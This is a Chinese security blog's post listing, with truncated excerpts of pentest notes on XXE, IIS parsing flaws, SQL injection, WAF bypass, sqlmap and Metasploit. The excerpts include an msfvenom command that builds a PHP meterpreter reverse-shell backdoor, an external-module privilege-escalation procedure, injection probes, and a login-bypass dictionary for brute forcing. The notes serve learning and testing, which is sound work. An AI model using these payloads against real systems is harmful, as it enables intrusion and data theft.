自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(12)
  • 资源 (1)
  • 收藏
  • 关注

转载 xxe的攻击及防御

xml文档的基础组成XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素; DTD实体DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。 实体又分为一般实体和参数实体1,一般实体的声明语法:<!ENTITY实体名 "实...

2018-06-30 15:11:56 6563 1

原创 中间件漏洞

 IISIIS解析漏洞IIS6.0解析利用方法有两种:1:在IIS6.0下,分号,冒号后面的不被解析,也就是说wooyun.asp;123.jpg会被服务器看成是wooyun.asp 2:当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。 3.默认解析:在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为<?PHPfp...

2018-06-25 14:03:19 463

原创 MSF建立webshell后门,并监听端口建立session连接

一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...

2018-06-23 15:56:33 12787

原创 MSF运用外部module提权

1 将下载的module复制到/usr/share/metasploit-framework/modules/exploits/linux/ ;  2 useexploit/linux/telnet/AF_PACKET  3 showoptions 4  exploit 查看当前所有会话msf exploit(linux/telnet/AF_PACKET) > sessions -l  选择...

2018-06-23 15:55:35 1202

原创 宽字节注入

由于php中,转义函数的存在,导致在' 等字符前加转义字符\,即  \' 导致 ' 被转义,无法注入;但通过输入%df和函数执行添加的%5C,被合并成%df%5C。由于GBK是两字节,这个%df%5C被MYSQL识别为GBK。导致本应的%df\变成%df%5C。%df%5C在GBK编码中没有对应,所以被当成无效字符。 %DF’ :会被PHP当中的addslashes函数转义为“%DF\'”,“\”...

2018-06-23 15:54:28 319

转载 SQL注入&WAF绕过姿势

  1.WAF过滤机制: 1.异常检测协议–拒绝不符合HTTP标准的请求;  2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证;  3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题;  4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活;  5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视...

2018-06-23 15:54:02 451

原创 防止SQL注入:

1、转义:1.1对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换1.2转义函数 mysql_real_escape_string-->>>>该函数通过转义字符串,实现了过滤无效化(消毒)的功能,可以避免sql注入  addslashes--->>>addslashes— 使用反斜线引用字符串,返回字符串,该字符串为了数...

2018-06-23 15:52:29 573

原创 判断数据库类型

判断数据类型 and (select count(*)fromsysobjects)>0                判断SQLserver返回正常,可能为SqlServer 和mysql,错误可能为access;and(select count(*) from msysobjects)>0         判断ACCESS        返回不够权限就是ACCESS数据库;  在注...

2018-06-23 15:51:55 2333

原创 SQL注入常用查询语句

DB用户user() DB版本version()全局函数@@datadir、@@hostname @@VERSION、@@version_compile_os 当前库database()•        ASCII转字符char()•        连接字符串CONCAT_WS(CHAR(32,58,32),user(),database(),version()) table_schema 数据库...

2018-06-23 15:50:17 2105

原创 SQL injection 判断语句

SQL injection 分为 number 和 char 型;区分方法:字符型的有引号引起来,且没有报错。   number型:通过 and 1=1正常and  1=2 不正常; char型:'报错1' and  '1 正常1' and  '0 错误  char型利用:' or '1(显示所有数据) 注释有两种方法,二、# 注释和 -- 注释    PS:在注释的时候一定要闭合好最后面加上--...

2018-06-23 15:49:42 173

原创 SQL Blind Injection

Blind Injection是什么:SQL注入过程中,SQL语句执行后,执行的数据不能回显到前端,此时我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注; 类型基于bool 型:应用程序仅仅根据执行的sql语句返回True(页面)和False(页面); 基于时间型:所以我们利用函数来判断页面是否发生延迟 ,来判断是否发生注入,如果延迟,则执行失败。类似搜索这类请求,boolean注入也无...

2018-06-23 15:48:42 3161

原创 SQLmap基本使用

一、基本使用 判断是否存在注入点-u"url" --batch                                                     获取全部数据库 -u  "url"  --dbs --batch                                                获取当前数据库 -u "url" --current-db --batc...

2018-06-23 15:47:34 188

绕过后台登录字典

含有php和asp的'or'='or'的绕过登录的字典,可使用burpsuite爆破测试是否成功

2018-05-04

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除